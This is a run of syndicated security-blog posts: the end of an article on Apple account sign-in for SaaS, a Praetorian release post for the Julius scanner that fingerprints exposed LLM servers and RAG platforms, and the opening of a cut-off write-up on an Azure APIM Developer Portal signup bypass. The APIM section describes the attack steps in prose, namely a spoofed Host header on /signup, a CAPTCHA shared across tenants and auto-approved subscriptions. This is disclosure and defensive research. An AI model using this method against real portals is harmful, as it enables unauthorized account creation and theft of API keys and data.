what.</li> <li><strong>Provisioning</strong>: Manually adding or removing users from every single tool is a waste of time that nobody has.</li> </ul><p>To fix this, many companies use <strong>Identity Orchestration platforms</strong> or <strong>Auth-as-a-Service</strong> tools. A platform like <strong>SSOJet</strong> comes in handy here. It acts like a bridge, letting users have that easy "apple experience" while keeping the it department happy because everything still flows through the central management system. It's basically the "peace treaty" between employee convenience and enterprise security.</p><p><strong>Diagram: The SaaS Implementation Lifecycle</strong></p><pre><code class="language-mermaid">graph LR A[Employee] --&gt; B{[SSOJet](ssojet.com) Gateway} B --&gt; C[Apple Account Auth] B --&gt; D[Enterprise Directory/Okta] C --&gt; E[SaaS App Access] D --&gt; E </code></pre><p>According to <a href="https://www.gartner.com/en/newsroom/press-releases/2023-05-22-gartner-says-75-percent-of-staff-will-use-personal-mobile-devices-for-work-by-2024">Gartner</a>, about 75% of staff will be using personal devices for work by the end of 2024. This makes it pretty clear that we can't just ignore these personal identity layers anymore. </p><p>So, it's about making things work together rather than fighting the trend. Next, let's talk about the "intelligence" behind these accounts and where things are heading.</p><h2>AI integration and the future of sign-in</h2><p>Imagine if your phone knew you were about to log in before you even moved a finger. With the way ai is going, apple is basically turning your "Apple Account" into a digital brain that handles the heavy lifting of security so you don't have to.</p><p>It's not just about chatbots; it's about how the silicon in your pocket learns your habits. If you usually check your work email at 8 AM from your home wifi, the on-device ai recognizes that pattern. If someone tries to log in from a random city at 3 AM, the system knows something is fishy without even needing a database check.</p><ul> <li><strong>Predictive Security</strong>: The device uses local machine learning to verify "user intent," basically making sure a human actually meant to click that button and it wasn't a pocket-dial or a script.</li> <li><strong>Secure Enclave Magic</strong>: All this ai processing happens right on the chip, not in some vulnerable cloud. Your biometric data never leaves the hardware, which is a huge win for privacy.</li> <li><strong>Contextual friction</strong>: If the ai feels confident it's you, the login is instant. If things look weird, it might trigger an extra verification step automatically.</li> </ul><blockquote> <p>According to <a href="https://www.cybersecurity-insiders.com/portfolio/2024-identity-and-access-management-report/">Cybersecurity Insiders</a>, 80% of data breaches involve compromised passwords, which is why ai-driven, passwordless flows are becoming the gold standard for saas founders.</p> </blockquote><p>For a developer, this means you can stop worrying about complex fraud detection. Here is how you might check if a credential is "likely" coming from a real user session:</p><pre><code class="language-python">def verify_login_intent(session_data): if session_data.is_biometric_verified and session_data.trust_score &gt; 0.9: return "Fast-track access granted" else: return "Trigger MFA challenge" </code></pre><p>It’s honestly wild how much we’re moving away from "what you know" (passwords) to "how you behave." Next up, we should look at the actual technical hurdles you'll hit when building this.</p><h2>SaaS implementation and developer hurdles</h2><p>Setting this up isn't exactly a "walk in the park" once you move past the marketing slides. If you're a developer, you know the real headache starts when you actually have to make the apple account handshake work with your existing backend without breaking everything.</p><p>It’s not just adding a button; it's managing a whole new set of keys and identifiers that apple demands. You can't just wing it like a basic oauth setup.</p><ul> <li><strong>Client Secret Woes</strong>: Unlike other providers where you get a permanent string, apple makes you generate a <strong>JWT</strong> (JSON Web Token) signed with a private key that expires. If your script to rotate these keys fails, your login button goes dead.</li> <li><strong>The "Sub" Problem</strong>: The user identifier (the <code>sub</code> claim) is unique to your developer team. If you're moving an app between accounts or merging companies, mapping those old users to new IDs is a total nightmare.</li> <li><strong>Web vs Native</strong>: Getting the flow to feel "native" on an iPhone while keeping a consistent session on a web browser requires some serious state management heavy lifting.</li> </ul><p>You can't just trust the frontend when it says "yeah, this guy is legit." You gotta decode that identity token on your server. Here is a look at how you might pull that off in node:</p><pre><code class="language-javascript">const jwt = require('jsonwebtoken'); const jwksClient = require('jwks-rsa'); // you gotta fetch apple's public keys first const client = jwksClient({ jwksUri: 'https://appleid.apple.com/auth/keys' }); function verifyAppleToken(token) { const decoded = jwt.decode(token, { complete: true }); // NOTE: This is a simplified example. In production, you need robust // error handling for the jwksClient and asynchronous callback logic. client.getSigningKey(decoded.header.kid, (err, key) =&gt; { if (err) { console.error("Key fetching failed", err); return; } const signingKey = key.publicKey || key.rsaPublicKey; jwt.verify(token, signingKey, { issuer: 'https://appleid.apple.com' }, (err, payload) =&gt; { if (err) console.error("token is trash"); else console.log("user is verified", payload.sub); }); }); } </code></pre><p>Honestly, most teams trip up on the <strong>email relay</strong> service. If a user chooses "Hide My Email," and your database expects a unique primary key based on email, you’re gonna have a bad time when they try to link accounts later.</p><p>As mentioned earlier, using a middle layer can save you from this manual labor, but if you're going DIY, watch those expiration dates on your secrets. Next, let’s wrap up with the big picture for founders.</p><h2>The final verdict for SaaS founders</h2><p>So, is it actually worth the dev time to pivot to apple account? If you’re building a saas app today, the answer is usually a "yes," but don't expect it to be a magic wand that fixes a bad product.</p><p>It really comes down to three things:</p><ul> <li><strong>Conversion wins</strong>: I've seen checkout pages in retail and finance jump by 20% just because users didn't have to type an email. Face id is just faster than a brain.</li> <li><strong>Security debt</strong>: By offloading auth to apple, you’re basically letting their billion-dollar security team handle the pii headaches. It makes your startup look way more "pro" to enterprise buyers.</li> <li><strong>Maintenance trap</strong>: As mentioned earlier, keeping those <strong>JWT tokens</strong> and private keys updated is a chore. If you don't automate it, your login button will break during a holiday weekend.</li> </ul><p>For founders, this isn't just a feature; it's about meeting users where they already live. Whether it's a doctor accessing healthcare records or a manager checking inventory, they want zero friction.</p><p><strong>The User Authentication Journey</strong><br> <img decoding="async" src="https://cdn.pseo.one/6853a4a8a2796a91bb994a76/68bc6a97410e253e325f40af/what-does-it-mean-to-sign-in-with-an-apple-account/mermaid-diagram-2.svg" alt="The User Authentication Journey"></p><p>Honestly, just don't overthink the "apple account" rebrand. It's the same tech under the hood, just with a friendlier face. If you value your sleep and your users' data, it's a solid bet.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/quantum-hardened-granular-resource-authorization-policies/" data-a2a-title="Quantum-Hardened Granular Resource Authorization Policies"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security&amp;#039;s Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/quantum-hardened-granular-resource-authorization-policies">https://www.gopher.security/blog/quantum-hardened-granular-resource-authorization-policies</a> </p>

<p><strong>TL;DR</strong>: Julius v0.2.0 nearly doubles LLM fingerprinting probe coverage from 33 to 63, adding detection for cloud-managed AI services (AWS Bedrock, Azure OpenAI, Vertex AI), high-performance inference servers (SGLang, TensorRT-LLM, Triton), AI gateways (Portkey, Helicone, Bifrost), and self-hosted RAG platforms (PrivateGPT, RAGFlow, Quivr). This release also hardens the scanner itself with response size limiting and TLS configuration for enterprise environments. Update Julius and scan your network — you almost certainly have AI infrastructure you don’t know about.</p><p>When we shipped the <a href="https://www.praetorian.com/blog/julius-update-from-17-to-33-probes-and-now-detecting-openclaw/" rel="noreferrer noopener">v0.1.1 update</a> back in February, Julius could detect 33 LLM services. That covered the self-hosted basics (Ollama, vLLM, llama.cpp) and a growing list of orchestration tools. But the gap was obvious: we had almost no coverage for cloud-managed AI services, production inference servers, or the AI gateway layer that sits between applications and models.</p><p>That gap is now closed. Julius v0.2.0 ships with <strong>63 probes</strong>, adding 30 new detections in a single release. More importantly, the <em>types</em> of infrastructure we now detect reflect where enterprise AI deployments are actually heading: cloud-managed endpoints, high-throughput inference engines, and the growing ecosystem of proxies and gateways that route traffic between them.</p><h2 class="wp-block-heading" id="5f5e1acf-3d93-47fd-b85c-eca8d7c590f6">What’s new in v0.2.0</h2><h3 class="wp-block-heading" id="0d06d4c8-d49f-4f1e-99f8-4e494e38d0be">Cloud-managed AI services (10 probes)</h3><p>This is the biggest category and the one we’ve been asked about most. Organizations deploying AI through their cloud provider often assume these endpoints are inherently private. They’re not — misconfigured API gateways, exposed proxy layers, and overly permissive network policies can put them on the open internet.</p><ul class="wp-block-list"> <li><strong>AWS Bedrock</strong> — Control plane and runtime detection via <code>/foundation-models</code> and <code>/model/{modelId}/converse</code></li> <li><strong>Azure OpenAI</strong> — Azure-specific OpenAI endpoint detection</li> <li><strong>Google Vertex AI</strong> — Vertex AI prediction and model endpoint detection</li> <li><strong>Databricks Model Serving</strong> — Model serving endpoint detection</li> <li><strong>Fireworks AI, Groq, Modal, Replicate, Together AI</strong> — Managed inference API detection</li> </ul><h3 class="wp-block-heading" id="1e08944b-ff5d-407a-a638-d8bbf1d3f0c7">Self-hosted inference servers (10 probes)</h3><p>These are the workhorses of production AI: high-performance inference engines that teams deploy for throughput, latency, or cost reasons. They tend to run with default configurations and minimal authentication.</p><ul class="wp-block-list"> <li><strong>SGLang</strong> — Detected via its unique <code>/server_info</code> endpoint exposing <code>mem_fraction_static</code> and <code>disaggregation_mode</code> fields</li> <li><strong>TensorRT-LLM</strong> — NVIDIA’s optimized inference runtime</li> <li><strong>Triton Inference Server</strong> — NVIDIA’s multi-framework serving platform</li> <li><strong>BentoML</strong> — ML model serving framework</li> <li><strong>Baseten Truss, DeepSpeed-MII, MLC LLM, Petals, PowerInfer, Ray Serve</strong> — Various self-hosted inference engines</li> </ul><h3 class="wp-block-heading" id="dc3a5015-fc0c-45e0-b1eb-a72a832d78a3">AI gateways and proxies (5 probes)</h3><p>The gateway layer is where organizations route, observe, and control traffic between their applications and LLM providers. An exposed gateway often means access to every model and API key behind it.</p><ul class="wp-block-list"> <li><strong>Portkey AI Gateway</strong> — AI gateway with provider routing and observability</li> <li><strong>Helicone</strong> — LLM observability and proxy platform</li> <li><strong>Bifrost</strong> — Multi-provider AI gateway</li> <li><strong>OmniRoute</strong> — LLM routing gateway</li> <li><strong>TensorZero</strong> — Model gateway with experimentation support</li> </ul><h3 class="wp-block-heading" id="c0a494f8-d8c6-4bcb-87eb-ce4389178f85">RAG and orchestration platforms (5 probes)</h3><p>Self-hosted RAG platforms are where things get particularly sensitive. These systems are purpose-built to ingest and query internal documents — contracts, HR policies, financial data, source code. An exposed RAG endpoint is, by definition, an exposed document store.</p><ul class="wp-block-list"> <li><strong>PrivateGPT</strong> — Private document Q&amp;A (detected via its <code>/v1/ingest/list</code> endpoint, which returns data even with zero ingested documents and auth disabled by default)</li> <li><strong>RAGFlow</strong> — Open-source RAG engine with deep document understanding</li> <li><strong>Quivr</strong> — Second brain RAG platform</li> <li><strong>h2oGPT</strong> — <a href="http://h2o.ai/" rel="noreferrer noopener">H2O.ai</a>‘s document Q&amp;A platform</li> <li><strong>Langflow</strong> — Visual LLM orchestration framework</li> </ul><h2 class="wp-block-heading" id="ccf95297-a0b7-4298-841e-a7c3e37f9f63">Why self-hosted RAG is the new shadow IT</h2><p>The OpenClaw story from our <a href="https://www.praetorian.com/blog/julius-update-from-17-to-33-probes-and-now-detecting-openclaw/" rel="noreferrer noopener">last update</a> highlighted what happens when AI agent platforms get exposed: leaked API keys, filesystem access, and user impersonation. With this release, we’re seeing the same pattern play out with RAG platforms — except the stakes are different. Instead of agent credentials, you’re looking at the documents themselves.</p><p><strong>PrivateGPT</strong> is a good example. The entire value proposition is <em>“keep your documents private by running everything locally.”</em> The irony is that PrivateGPT’s API defaults to no authentication. Its <code>/v1/ingest/list</code> endpoint is a simple GET that returns every ingested document’s metadata, including filenames and chunk counts. The model field is hardcoded to <code>"private-gpt"</code>, which makes detection trivial and false positives near-zero.</p><p><strong>RAGFlow</strong> follows a similar pattern. Its <code>/v1/system/healthz</code> endpoint is unauthenticated and returns a JSON health check with a <code>doc_engine</code> field that’s unique to RAGFlow — it tracks the status of the Elasticsearch or Infinity backend that powers document retrieval. Even when RAGFlow is partially broken (HTTP 500), the health endpoint still responds with the same structure, making detection reliable in any state.</p><p>The problem isn’t that these tools are insecure by design. It’s that they’re easy to deploy, they serve an obvious need (“let me ask questions about our internal docs”), and teams spin them up without involving security. By the time anyone notices, the system has been indexing sensitive documents on an endpoint with no auth, no network restriction, and no monitoring.</p><p>This is shadow IT for the AI era, and it’s why discovery tooling matters.</p><h2 class="wp-block-heading" id="62d0339a-a8f9-4083-9311-4c150542b427">What else changed</h2><p>Beyond new probes, v0.2.0 includes changes to the scanner itself:</p><p><strong>Breaking API change:</strong> <code>scanner.NewScanner()</code> now requires two additional parameters — <code>maxResponseSize</code> and <code>tlsConfig</code>. If you’re using Julius as a library, see the <a href="https://github.com/praetorian-inc/julius/blob/main/CHANGELOG.md" rel="noreferrer noopener">migration guide</a> in the changelog.</p><p><strong>New CLI flags:</strong></p><ul class="wp-block-list"> <li><code>--max-response-size</code> — Limits response body size (default 10MB) to prevent memory exhaustion from large or malicious responses</li> <li><code>--insecure</code> — Skips TLS certificate verification for testing environments</li> <li><code>--ca-cert</code> — Specifies a custom CA certificate file for enterprise PKI environments</li> </ul><p><strong>Probe quality fixes:</strong></p><ul class="wp-block-list"> <li>Fixed Ollama probe false-positiving on Ollama-compatible servers (SGLang, KoboldCpp) by requiring the <code>"families"</code> field in <code>/api/tags</code> responses</li> <li>Fixed <code>header.contains</code> rules that silently failed on HTTP/2 connections — this affected 5 cloud probes (AWS Bedrock, Cloudflare AI Gateway, Fireworks AI, Modal, OmniRoute)</li> <li>Removed overly generic detection blocks from Bifrost, DeepSpeed-MII, and Groq that caused cross-probe false positives</li> </ul><h2 class="wp-block-heading" id="4b0dd329-72a4-4875-af8c-d9619364d123">What this means for your assessments</h2><p>If you’re running Julius as part of your attack surface discovery workflow, update to v0.2.0:</p><pre id="510d68e8-6a8b-44a6-b4dd-9cfae893a6da" class="wp-block-code"><code><code>$ go install github.com/praetorian-inc/julius/cmd/julius@latest $ julius probe <target></target></code></code></pre><p>For enterprise environments with internal CAs:</p><pre id="4b986ae4-b239-4383-b14b-f92350b7e985" class="wp-block-code"><code><code>$ julius probe --ca-cert /path/to/ca.pem <target></target></code></code></pre><p>All 63 probes are embedded in the binary. No external config, no probe downloads, no API keys.</p><p>The coverage now spans the full AI infrastructure stack: from cloud-managed inference (Bedrock, Azure OpenAI, Vertex AI) through self-hosted serving (SGLang, TensorRT-LLM, Triton) to the RAG and orchestration layer (PrivateGPT, RAGFlow, Langflow). If an organization is running AI infrastructure, Julius should find it.</p><p>We’re continuing to expand probe coverage as new tools emerge. If there’s a service you’re seeing in the wild that Julius doesn’t cover, <a href="https://github.com/praetorian-inc/julius/issues" rel="noreferrer noopener">open an issue</a> or submit a PR. Probes are simple YAML files — you can test locally with <code>julius validate ./probes </code>before submitting.</p><h2 class="wp-block-heading" id="1d4b8084-738e-4bd1-9649-abc7d548738e">FAQ</h2><p><strong>What’s the difference between Julius and model fingerprinting tools?</strong> Model fingerprinting identifies which LLM generated a piece of text. Julius identifies the <em>server infrastructure</em>: what software is running on the endpoint. Think of it as service detection for AI, similar to what Nmap does for traditional services.</p><p><strong>Does Julius send anything malicious?</strong> No. Julius sends standard HTTP requests (GET/POST to known paths) and analyzes the responses. It doesn’t exploit vulnerabilities, submit prompts, or modify anything on the target. It’s passive fingerprinting.</p><p><strong>How do probes get validated before release?</strong> Every probe is tested against live instances of the target service and cross-tested against other LLM services to confirm zero false positives. This release also fixed several cross-probe false positives from v0.1.x.</p><p><strong>Can I add detection for a service Julius doesn’t support yet?</strong> Yes. Probes are defined in simple YAML files. The <a href="https://github.com/praetorian-inc/julius/blob/main/CONTRIBUTING.md" rel="noreferrer noopener">contributing guide</a> walks through the format, and you can test locally with <code>julius validate ./probes</code> before submitting a PR.</p><p><strong>Why is there a breaking API change?</strong> The <code>NewScanner()</code> signature now requires <code>maxResponseSize</code> and <code>tlsConfig</code> parameters. This was necessary to add response size limiting (preventing OOM from malicious servers) and TLS configuration for enterprise environments. If you’re only using the CLI, nothing changes.</p><p>The post <a href="https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/">Julius v0.2.0: From 33 to 63 Probes — Now Detecting Cloud AI, Enterprise Inference, and RAG Pipelines</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/julius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines/" data-a2a-title="Julius v0.2.0: From 33 to 63 Probes — Now Detecting Cloud AI, Enterprise Inference, and RAG Pipelines"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Michelle Rhodes">Michelle Rhodes</a>. Read the original post at: <a href="https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/">https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/</a> </p>

<div data-elementor-type="wp-post" data-elementor-id="10966" class="elementor elementor-10966" data-elementor-post-type="post"> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-93afc5a e-con-full e-flex e-con e-parent" data-id="93afc5a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-86067b8 elementor-widget elementor-widget-text-editor" data-id="86067b8" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The Azure APIM signup bypass is a critical vulnerability affecting 97.9% of internet-facing Developer Portals. Azure API Management (APIM) exposes APIs to external consumers through a Developer Portal, the interface where developers self-register, obtain API keys, and make API calls. The default APIM configuration ships with Basic Authentication enabled as the identity provider and the Starter product set to auto-approve subscriptions. When an administrator disables developer self-signup, they reasonably expect that endpoint to no longer be reachable.</p> <p>It doesn’t. An anonymous attacker can create an account, subscribe to API products, obtain valid API keys, and access backend services, all without authentication or relationship to the target organization. The “disable signup” toggle in Azure APIM’s Developer Portal is purely cosmetic. The backend REST API continues to accept registrations from anyone. This is an <strong>unauthenticated, internet-facing vulnerability</strong> in a service that is internet-facing by design.</p> <p>Praetorian noted that the original issue was detected by security researcher Mihalis Haatainen at <a href="https://www.bountyy.fi/">Bountyy Oy</a> in September 2025 (see <a href="https://github.com/bountyyfi/Azure-APIM-Cross-Tenant-Signup-Bypass/security/advisories/GHSA-vcwf-73jp-r7mv">GHSA-vcwf-73jp-r7mv</a>). Mihalis Haatainen reported the issue to Microsoft’s Security Response Center (MSRC). After two submissions and additional technical details, MSRC issued its final determination: <strong>“By design.”</strong></p> <p>Four months later, we assessed the real-world prevalence.</p> <p>We built a full reproduction environment, demonstrated the complete attack chain from anonymous internet access to sensitive API data exfiltration, and conducted a wide-scale analysis across the internet-facing APIM landscape. We found over 25,000 Azure APIM Developer Portals exposed to the internet. Based on our heuristic analysis, we estimated that 97.9% of them still accept signup requests. Only 51 instances out of 25,379 have actually removed the vulnerable Basic Authentication provider. The attack requires a web browser and a curl command; no credentials, no prior access, and no Azure subscription in the target tenant.</p> <p> </p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8c71d64 e-con-full e-flex e-con e-parent" data-id="8c71d64" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4d027db elementor-widget elementor-widget-heading" data-id="4d027db" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">The Vulnerability</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9040393 e-con-full e-flex e-con e-parent" data-id="9040393" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-568bfd5 elementor-widget elementor-widget-text-editor" data-id="568bfd5" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <a id="the-three-part-flaw"></a> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a4066f6 e-con-full e-flex e-con e-parent" data-id="a4066f6" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae49ae8 elementor-widget elementor-widget-heading" data-id="ae49ae8" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">The Three-Part Flaw</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e6910fb e-con-full e-flex e-con e-parent" data-id="e6910fb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0a00cc7 elementor-widget elementor-widget-text-editor" data-id="0a00cc7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The fundamental issue is a disconnect between what administrators see in the Azure Portal and what actually happens on the backend. Three separate design decisions combine to create the vulnerability:</p> <p><strong>1. The UI toggle is cosmetic:</strong> When an administrator sets portalsettings/signup.properties.enabled to false, the developer portal reads this flag and hides the signup form. The underlying REST API endpoint at /signup remains active and continues to accept registration requests regardless of what the UI displays.</p> <p><strong>2. No tenant validation on the signup endpoint.</strong> Azure APIM Developer Portals are multi-tenant. The APIM infrastructure uses the Host header in incoming requests to route them to the correct instance. When an attacker sends a POST /signup request with Host: victim-portal.developer.azure-api.net, the infrastructure routes it to the victim’s instance. There is no validation that the request originated from that tenant’s portal, that the sender has any relationship to the target organization, or that the request was initiated from the target’s domain.</p> <p><strong>3. The CAPTCHA service is shared across all tenants.</strong> The signup flow includes a CAPTCHA challenge. However, the CAPTCHA validation service is global to Azure APIM. A challenge generated on Instance A is accepted as valid when submitted to Instance B.</p> <p><a id="X7b726d72045493ee04b98d787fee093aed871b0"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-30e11bf e-con-full e-flex e-con e-parent" data-id="30e11bf" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a5691fb elementor-widget elementor-widget-heading" data-id="a5691fb" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">The Kill Chain: From Anonymous Access to API Keys</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8130df1 e-con-full e-flex e-con e-parent" data-id="8130df1" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-15a59e6 elementor-widget elementor-widget-text-editor" data-id="15a59e6" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Account creation is the entry point. The actual severity depends on what APIs are exposed through the Developer Portal and whether the attacker can obtain subscription keys to call them. We reproduced the full attack chain on controlled infrastructure to map each step.</p> <p><a id="why-account-creation-alone-is-not-enough"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-aab12e7 e-con-full e-flex e-con e-parent" data-id="aab12e7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9bf00e2 elementor-widget elementor-widget-heading" data-id="9bf00e2" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Why Account Creation Alone Is Not Enough</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4ebf48b e-con-full e-flex e-con e-parent" data-id="4ebf48b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-6f62cfc elementor-widget elementor-widget-text-editor" data-id="6f62cfc" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>An APIM Developer Portal account gives the attacker a session. What they can do with that session depends on the <strong>product configuration</strong>, a second layer of APIM settings that determines post-authentication access.</p> <p>APIs in APIM are not exposed directly. They are grouped into <strong>Products</strong>, and users must subscribe to a product to obtain a subscription key. Two product-level settings, subscriptionRequired and approvalRequired, determine whether an attacker can self-serve to obtain API access. The critical combination is subscriptionRequired: true with approvalRequired: false (subscription needed, but auto-approved). This is the <strong>default configuration</strong> for the built-in Starter product that ships with every new APIM instance. An attacker who creates an account can immediately subscribe and receive a valid API key without administrator involvement.</p> <p><a id="attack-path-overview"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-6868fdd e-con-full e-flex e-con e-parent" data-id="6868fdd" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-63f1ca5 elementor-widget elementor-widget-heading" data-id="63f1ca5" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Attack Path Overview</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-7dcc48d e-con-full e-flex e-con e-parent" data-id="7dcc48d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-d2a4dec elementor-widget elementor-widget-text-editor" data-id="d2a4dec" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-00bfab0 e-con-full e-flex e-con e-parent" data-id="00bfab0" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3298fe1 elementor-widget elementor-widget-image" data-id="3298fe1" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img fetchpriority="high" decoding="async" width="544" height="1308" src="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1.webp" class="attachment-full size-full wp-image-10950" alt="Flowchart showing attack steps from anonymous attacker discovering target via Shodan to creating developer account and exfiltrating data" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1.webp 